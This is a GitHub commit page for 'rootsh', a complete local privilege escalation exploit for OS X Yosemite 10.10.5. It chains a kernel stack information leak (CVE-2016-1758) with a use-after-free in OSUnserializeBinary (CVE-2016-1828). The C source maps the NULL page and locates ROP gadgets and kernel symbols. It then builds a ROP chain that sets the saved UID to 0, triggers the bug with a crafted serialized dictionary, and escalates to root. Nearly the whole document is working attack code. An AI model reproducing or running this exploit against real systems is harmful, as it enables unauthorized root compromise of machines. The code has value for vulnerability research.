Skip to content

Commit

Permalink
rootsh
Browse files Browse the repository at this point in the history
rootsh is a local privilege escalation for OS X 10.10.5 (build 14F27)
that exploits CVE-2016-1828 and CVE-2016-1758.
  • Loading branch information
bazad committed May 18, 2016
0 parents commit ba4a86b
Show file tree
Hide file tree
Showing 9 changed files with 429 additions and 0 deletions.
25 changes: 25 additions & 0 deletions Makefile
@@ -0,0 +1,25 @@
# Name of the final exploit binary.
TARGET = rootsh

all: $(TARGET)

CFLAGS = -Wall -Wpedantic -Werror
FRAMEWORKS = -framework IOKit

# Note that in addition to the standard flags we also need
#
# -m32 -Wl,-pagezero_size,0
#
# We need these flags because we are leveraging the use-after-free to generate
# a kernel NULL-pointer dereference. By mapping the NULL page in user space we
# ensure that when the kernel dereferences the NULL pointer it gets a value
# that we control. OS X does not allow 64-bit processes to map the NULL page;
# however, for legacy support, 32-bit processes can map the NULL page. In order
# to do so we generate a Mach-O executable without an initial __PAGEZERO
# segment protecting NULL. The "-m32" flag compiles the executable as 32-bit,
# while the "-Wl,-pagezero_size,0" flag causes the linker to not insert a
# __PAGEZERO segment in the final Mach-O executable.
$(TARGET): main.c kernel_image.c kernel_rop.c kernel_slide.c
	clang $(CFLAGS) $(FRAMEWORKS) -m32 -Wl,-pagezero_size,0 -O3 $^ -o $@

# Remove the built binary.
clean:
	rm -f -- $(TARGET)
28 changes: 28 additions & 0 deletions README.md
@@ -0,0 +1,28 @@
## rootsh

rootsh is a local privilege escalation targeting OS X Yosemite 10.10.5 build
14F27. It exploits [CVE-2016-1758] and [CVE-2016-1828], two vulnerabilities in
XNU that were patched in OS X El Capitan [10.11.4] and [10.11.5]. rootsh will
not work on platforms with SMAP enabled.

[CVE-2016-1758]: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1758
[CVE-2016-1828]: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1828
[10.11.4]: https://support.apple.com/en-us/HT206167
[10.11.5]: https://support.apple.com/en-us/HT206567

### CVE-2016-1758

CVE-2016-1758 is an information leak caused by copying out uninitialized bytes
of kernel stack to user space. By comparing leaked kernel pointers with fixed
reference addresses it is possible to recover the kernel slide.

### CVE-2016-1828

CVE-2016-1828 is a use-after-free during object deserialization. By passing a
crafted binary-serialized dictionary into the kernel, it is possible to trigger
a virtual method invocation on an object with a controlled vtable pointer.

### License

The rootsh code is released into the public domain. As a courtesy I ask that if
you use any of this code in another project you attribute it to me.
113 changes: 113 additions & 0 deletions kernel_image.c
@@ -0,0 +1,113 @@
/* kernel_image.c
* Brandon Azad
*
* Kernel parsing routines to find addresses of symbols and byte sequences.
*/

#include "kernel_image.h"

#include <fcntl.h>
#include <mach/mach.h>
#include <mach-o/nlist.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <unistd.h>

#include "kernel_slide.h"

/* Read-only mmap of the on-disk kernel binary; points at its Mach-O header. */
static struct mach_header_64 * kernel;
/* Size in bytes of the mapped kernel file. */
static size_t kernel_size;
/* Unslid (compile-time) virtual base address of the kernel's __TEXT segment. */
static uint64_t kernel_base;
/* Pointer to the LC_SYMTAB load command inside the mapping. */
static struct symtab_command * kernel_symtab;

/* Load the kernel binary into the current process's memory and parse it to
   find the symbol table.
   Returns 0 on success, or a step-specific nonzero code:
     1 open failed, 2 fstat failed, 3 mmap failed,
     4 no LC_SYMTAB load command found, 5 no __TEXT segment found. */
int
load_kernel() {
	/* The on-disk kernel image for this OS X release. */
	int fd = open("/System/Library/Kernels/kernel", O_RDONLY);
	if (fd == -1) {
		return 1;
	}
	struct stat st;
	int err = fstat(fd, &st);
	if (err) {
		close(fd);
		return 2;
	}
	kernel_size = st.st_size;
	kernel = mmap(NULL, kernel_size, PROT_READ, MAP_SHARED, fd, 0);
	/* The mapping keeps the file referenced; the descriptor is no longer
	   needed either way. */
	close(fd);
	if (kernel == MAP_FAILED) {
		return 3;
	}
	/* Walk the load commands that immediately follow the Mach-O header,
	   recording the symbol-table command and the __TEXT base address.
	   NOTE(review): the loop bound is kernel + sizeofcmds rather than
	   kernel + sizeof(*kernel) + sizeofcmds, so the walk stops
	   sizeof(struct mach_header_64) bytes early. Harmless in practice
	   because LC_SYMTAB and __TEXT appear well before the end, but worth
	   confirming. */
	struct load_command * lc = (struct load_command *)((uintptr_t)kernel + sizeof(*kernel));
	while ((uintptr_t)lc < (uintptr_t)kernel + (uintptr_t)kernel->sizeofcmds) {
		if (lc->cmd == LC_SYMTAB) {
			kernel_symtab = (struct symtab_command *)lc;
		} else if (lc->cmd == LC_SEGMENT_64) {
			struct segment_command_64 * sc = (struct segment_command_64 *)lc;
			if (strcmp(sc->segname, SEG_TEXT) == 0) {
				kernel_base = sc->vmaddr;
			}
		}
		lc = (struct load_command *)((uintptr_t)lc + lc->cmdsize);
	}
	if (kernel_symtab == NULL) {
		return 4;
	}
	if (kernel_base == 0) {
		return 5;
	}
	return 0;
}

/* Find the address of the given kernel symbol in kernel memory. The returned
   address factors in the kernel slide, so it can be used directly in building
   a ROP payload.
   On success stores the slid address in *addr and returns 0. Returns 1 if the
   name is not in the string table, 2 if the matching symbol is not defined in
   a section (N_SECT), 3 if no nlist entry references the matched string. */
int
find_kernel_symbol(const char * name, uint64_t * addr) {
	const char * base = (const char *)((uintptr_t)kernel + kernel_symtab->stroff);
	/* Skip the first 4 bytes of the string table; offset 0 is reserved
	   (conventionally the empty string). */
	const char * str = (const char *)((uintptr_t)base + 4);
	const char * end = (const char *)((uintptr_t)base + kernel_symtab->strsize);
	uint64_t strx;
	/* Phase 1: scan the string table for an exact match of name and record
	   its offset (strx) from the start of the table. */
	for (;; ++str) {
		strx = (uintptr_t)str - (uintptr_t)base;
		const char * p = name;
		/* Advance both cursors while the strings agree and name has
		   characters left. */
		while (str < end && *p == *str && *p) {
			++p; ++str;
		}
		/* A full match: both strings reached their NUL terminators at
		   the same position. */
		if (str < end && *p == *str) {
			break;
		}
		/* Mismatch: skip to the terminator of the current entry so the
		   outer loop's ++str lands on the next string. */
		while (str < end && *str) {
			++str;
		}
		if (str == end) {
			return 1;
		}
	}
	/* Phase 2: find the nlist entry whose string-table index matches the
	   offset recorded above. */
	struct nlist_64 * nl = (struct nlist_64 *) ((uintptr_t)kernel + kernel_symtab->symoff);
	for (uint32_t i = 0; i < kernel_symtab->nsyms; ++i) {
		if (nl[i].n_un.n_strx == strx) {
			/* Only accept symbols defined in a section. */
			if ((nl[i].n_type & N_TYPE) != N_SECT) {
				return 2;
			}
			*addr = nl[i].n_value + kernel_slide;
			return 0;
		}
	}
	return 3;
}

/* Find the address of the given byte sequence in kernel memory. The returned
   address factors in the kernel slide, so it can be used directly in building
   a ROP payload.
   On success stores the slid runtime address in *addr and returns 0; returns
   1 if the sequence does not appear in the mapped kernel image. */
int
find_kernel_bytes(const void * value, size_t size, uint64_t * addr) {
	const void * found = memmem(kernel, kernel_size, value, size);
	if (found == NULL) {
		return 1;
	}
	/* Translate the match's file offset into a slid virtual address.
	   NOTE(review): this assumes the containing segment's virtual layout
	   mirrors its file layout relative to __TEXT — true for the text
	   gadgets searched for here. */
	*addr = (uint64_t)found - (uint64_t)kernel + kernel_base + kernel_slide;
	return 0;
}
12 changes: 12 additions & 0 deletions kernel_image.h
@@ -0,0 +1,12 @@
/* kernel_image.h
* Brandon Azad
*
* Kernel parsing routines to find addresses of symbols and byte sequences.
*/

/* Guard against double inclusion (the header previously had no guard). */
#pragma once

#include <mach-o/loader.h>
#include <stdint.h> /* uint64_t, used in the prototypes below */
#include <stdlib.h>

/* Map the on-disk kernel binary into this process and locate its symbol
   table and __TEXT base. Returns 0 on success, nonzero on failure. */
int load_kernel(void);

/* Look up a kernel symbol by name; on success stores its slid runtime
   address in *addr. Returns 0 on success, nonzero on failure. */
int find_kernel_symbol(const char * name, uint64_t * addr);

/* Search the mapped kernel image for a byte sequence; on success stores its
   slid runtime address in *addr. Returns 0 on success, nonzero on failure. */
int find_kernel_bytes(const void * value, size_t size, uint64_t * addr);
129 changes: 129 additions & 0 deletions kernel_rop.c
@@ -0,0 +1,129 @@
/* kernel_rop.c
* Brandon Azad
*
* Kernel instruction pointer control to execute the ROP payload.
*
* CVE-2016-1828:
* This vulnerability is a use-after-free in OSUnserializeBinary that can be
* triggered via the io_service_get_matching_services_bin Mach trap from
* user space.
*/

#include "kernel_rop.h"

#include <IOKit/IOKitLib.h>
#include <IOKit/iokitmig.h>
#include <mach/mach.h>
#include <stdio.h>

#include "kernel_image.h"

/* Byte signatures of the ROP gadgets required by the payload. Each sequence
   is located in the kernel's executable image via find_kernel_bytes. */

/* Stack pivot: swaps esp with eax (which the kernel sets to 0 at the hijacked
   virtual call), then pops the real ROP stack pointer from address 0. */
static const uint8_t xchg_esp_eax_pop_rsp_ins[] = {
	0x94, /* xchg esp, eax */
	0x5c, /* pop rsp */
	0xc3, /* ret */
};
/* Moves a function's return value (rax) into rdi, the first argument
   register, to chain the credential-lookup calls. */
static const uint8_t xchg_rax_rdi_ins[] = {
	0x48, 0x97, /* xchg rax, rdi */
	0xc3, /* ret */
};
/* Writes 0 to the 32-bit field at offset 8 of the structure in rdi — the
   saved UID field of the posix credentials. */
static const uint8_t set_svuid_0_ins[] = {
	0xc7, 0x47, 0x08, 0x00, 0x00, 0x00, 0x00, /* mov dword ptr [rdi+8], 0 */
	0xc3, /* ret */
};

/* Build the ROP payload that will be used to control code execution in the
   kernel. The payload is stored on the NULL page, so the kernel will panic if
   SMAP is enabled. The entry point is the instruction pointer stored in
   virtual method 4, which will pivot to the ROP stack. The ROP stack is placed
   at the end of the NULL page so that there's room for the stack frames of the
   functions we call.
   The payload itself sets the saved user ID to 0. Once we return from the
   kernel we can elevate privileges by calling seteuid(0).
   Returns 0 on success; 1 if a gadget is missing, 2 if a symbol is missing,
   3 if the NULL page could not be mapped. */
int
build_rop_payload() {
	uint64_t xchg_esp_eax_pop_rsp, xchg_rax_rdi, set_svuid_0;
	uint64_t current_proc, proc_ucred, posix_cred_get, thread_exception_return;
	int err = 0;
	/* Locate the three gadgets in the kernel image (slid addresses). */
	err |= find_kernel_bytes(xchg_esp_eax_pop_rsp_ins, sizeof(xchg_esp_eax_pop_rsp_ins), &xchg_esp_eax_pop_rsp);
	err |= find_kernel_bytes(xchg_rax_rdi_ins, sizeof(xchg_rax_rdi_ins), &xchg_rax_rdi);
	err |= find_kernel_bytes(set_svuid_0_ins, sizeof(set_svuid_0_ins), &set_svuid_0);
	if (err) {
		printf("error: could not locate ROP gadgets\n");
		return 1;
	}
	/* Locate the kernel functions the payload calls. */
	err |= find_kernel_symbol("_current_proc", &current_proc);
	err |= find_kernel_symbol("_proc_ucred", &proc_ucred);
	err |= find_kernel_symbol("_posix_cred_get", &posix_cred_get);
	err |= find_kernel_symbol("_thread_exception_return", &thread_exception_return);
	if (err) {
		printf("error: could not locate symbols for ROP payload\n");
		return 2;
	}
	/* Map one page at virtual address 0. This only succeeds because the
	   executable is 32-bit and linked without a __PAGEZERO segment (see
	   the Makefile). */
	vm_address_t payload_addr = 0;
	size_t size = 0x1000;
	/* In case we are re-executing, deallocate the NULL page. */
	vm_deallocate(mach_task_self(), payload_addr, size);
	kern_return_t kr = vm_allocate(mach_task_self(), &payload_addr, size, 0);
	if (kr != KERN_SUCCESS) {
		printf("error: could not allocate NULL page for payload\n");
		return 3;
	}
	/* The fake vtable lives at address 0; the ROP stack occupies the last
	   8 qword slots of the page so called functions have room below for
	   their own stack frames. */
	uint64_t * vtable = (uint64_t *)payload_addr;
	uint64_t * rop_stack = ((uint64_t *)(payload_addr + size)) - 8;
	/* Virtual method 4 is called in the kernel with rax set to 0. */
	vtable[0] = (uint64_t)rop_stack; /* *0 = rop_stack */
	vtable[4] = xchg_esp_eax_pop_rsp; /* rsp = 0; rsp = *rsp; start rop */
	rop_stack[0] = current_proc; /* rax = &proc */
	rop_stack[1] = xchg_rax_rdi; /* rdi = &proc */
	rop_stack[2] = proc_ucred; /* rax = &cred */
	rop_stack[3] = xchg_rax_rdi; /* rdi = &cred */
	rop_stack[4] = posix_cred_get; /* rax = &posix_cred */
	rop_stack[5] = xchg_rax_rdi; /* rdi = &posix_cred */
	rop_stack[6] = set_svuid_0; /* we are now setuid 0 */
	rop_stack[7] = thread_exception_return; /* stop rop */
	return 0;
}

/* Trigger the use-after-free to start executing the ROP payload. If the ROP
   payload succeeds the UID and GID of the process will be set to 0.
   Returns 0 once getuid() reports root, 1 if the IOKit master port is
   unavailable, 2 if the payload did not run or did not grant root. */
int
execute_rop_payload() {
	/* Hand-crafted binary-serialized dictionary whose deserialization in
	   the kernel exercises the use-after-free; the per-entry comments
	   track the collection/heap state during parsing. */
	uint32_t data[] = {
		0x000000d3, /* magic */
		0x81000010, /* 0: OSDictionary */
		0x08000002, 0x00000061, /* 1: key "a" */
		0x04000020, 0x00000000, 0x00000000, /* 2: 1[2: OSNumber] */
		0x08000002, 0x00000062, /* 3: key "b" */
		0x04000020, 0x00000000, 0x00000000, /* 4: 2[4: OSNumber] */
		0x0c000001, /* 5: key "a" */
		0x0b000001, /* 6: true ; heap freelist: 1[2:] */
		0x0c000003, /* 7: key "b" */
		0x0b000001, /* 8: true ; heap freelist: 2[4:] 1[2:] */
		0x0c000001, /* 9: key "a" */
		0x0a000028, /* 10: 2[10,4: OSData] => 1[2: contents] */
		0x00000000, 0x00000000, /* vtable ptr */
		0x00000000, 0x00000000, 0x00000000, 0x00000000,
		0x00000000, 0x00000000, 0x00000000, 0x00000000,
		0x0c000001, /* 11: key "b" */
		0x8c000002, /* 12: 1[2: contents]->retain() */
	};
	mach_port_t master_port, iterator;
	kern_return_t kr = IOMasterPort(MACH_PORT_NULL, &master_port);
	if (kr != KERN_SUCCESS) {
		return 1;
	}
	/* Hand the crafted dictionary to the kernel; if the payload ran, our
	   saved UID is now 0. */
	kr = io_service_get_matching_services_bin(master_port, (char *)data, sizeof(data), &iterator);
	/* Promote the saved UID to the real/effective IDs. Return values are
	   intentionally unchecked; the getuid() test below is authoritative. */
	seteuid(0);
	setuid(0);
	setgid(0);
	if (kr == KERN_SUCCESS) {
		IOObjectRelease(iterator);
	}
	if (getuid() == 0) {
		return 0;
	}
	printf("error: could not execute ROP payload\n");
	return 2;
}
8 changes: 8 additions & 0 deletions kernel_rop.h
@@ -0,0 +1,8 @@
/* kernel_rop.h
* Brandon Azad
*
* Kernel instruction pointer control to execute the ROP payload.
*/

/* Guard against double inclusion (the header previously had no guard). */
#pragma once

/* Locate the ROP gadgets and kernel symbols and write the ROP payload to the
   NULL page. Returns 0 on success, nonzero on failure. */
int build_rop_payload(void);

/* Trigger the kernel bug so the prepared payload runs. Returns 0 once the
   process has UID 0, nonzero on failure. */
int execute_rop_payload(void);
62 changes: 62 additions & 0 deletions kernel_slide.c
@@ -0,0 +1,62 @@
/* kernel_slide.c
* Brandon Azad
*
* Kernel information leak to recover the kernel slide.
*
* CVE-2016-1758:
* This is a kernel information leak in the function if_clone_list caused by
* copying out 8 uninitialized bytes of the kernel stack to user space.
*/

#include "kernel_slide.h"

#include <net/if.h>
#include <stdio.h>
#include <sys/ioctl.h>
#include <unistd.h>

uint64_t kernel_slide;

/* Check whether addr lies in the virtual address range that holds kernel
   (and kext) mappings on this platform:
   [0xffffff7f00000000, 0xffffff8100000000). */
static int
is_kernel_pointer(uint64_t addr) {
	const uint64_t range_lo = 0xffffff7f00000000;
	const uint64_t range_hi = 0xffffff8100000000;
	if (addr < range_lo) {
		return 0;
	}
	return addr < range_hi;
}

/* Check whether slide is a plausible kernel slide: only bits 21 through 30
   may be set (a multiple of 0x200000 strictly below 0x80000000).
   slide is a subset of the mask exactly when OR-ing the mask in changes
   nothing. */
static int
is_kernel_slide(uint64_t slide) {
	const uint64_t slide_mask = 0x000000007fe00000;
	return (slide | slide_mask) == slide_mask;
}

/* Recover the kernel slide. The kernel slide is used to translate the
   compile-time addresses in the kernel binary to runtime addresses in the live
   kernel.
   Returns 0 on success (the global kernel_slide is set); nonzero error codes:
   1 socket failed, 2 ioctl failed, 3 leaked value is not a kernel pointer,
   4 derived slide is implausible. */
int
find_kernel_slide() {
	int sockfd = socket(AF_INET, SOCK_STREAM, 0); /* prime stack */
	if (sockfd == -1) {
		printf("error: socket failed\n");
		return 1;
	}
	/* if_clone_list copies out IFNAMSIZ bytes per cloner but initializes
	   only the interface name, leaking stale kernel stack in the tail. */
	char buffer[IFNAMSIZ];
	struct if_clonereq ifcr = {
		.ifcr_count = 1,
		.ifcr_buffer = buffer,
	};
	int err = ioctl(sockfd, SIOCIFGCLONERS, &ifcr);
	if (err == -1) {
		/* NOTE(review): sockfd is leaked on this path; harmless for a
		   short-lived process, but close(sockfd) would be cleaner. */
		printf("error: ioctl failed\n");
		return 2;
	}
	close(sockfd);
	/* Bytes 8..15 of the buffer are the uninitialized leak; on this build
	   they hold a stale kernel return address. */
	uint64_t value = *(uint64_t *)(buffer + 8);
	if (!is_kernel_pointer(value)) {
		printf("error: leaked 0x%016llx\n", value);
		return 3;
	}
	/* Subtract the address's known unslid value to get the slide. */
	kernel_slide = value - 0xffffff800033487f; /* 10.10.5 (14F27): __kernel__: _ledger_credit+95 */
	if (is_kernel_slide(kernel_slide)) {
		return 0;
	}
	printf("error: leaked 0x%016llx\n", value);
	return 4;
}
11 changes: 11 additions & 0 deletions kernel_slide.h
@@ -0,0 +1,11 @@
/* kernel_slide.h
* Brandon Azad
*
* Kernel information leak to recover the kernel slide.
*/

/* Guard against double inclusion (the header previously had no guard). */
#pragma once

#include <stdint.h>

/* The recovered kernel slide: runtime offset added to every compile-time
   kernel address. Defined in kernel_slide.c. */
extern uint64_t kernel_slide;

/* Recover the kernel slide from a kernel stack infoleak and store it in
   kernel_slide. Returns 0 on success, nonzero on failure. */
int find_kernel_slide(void);

0 comments on commit ba4a86b

Please sign in to comment.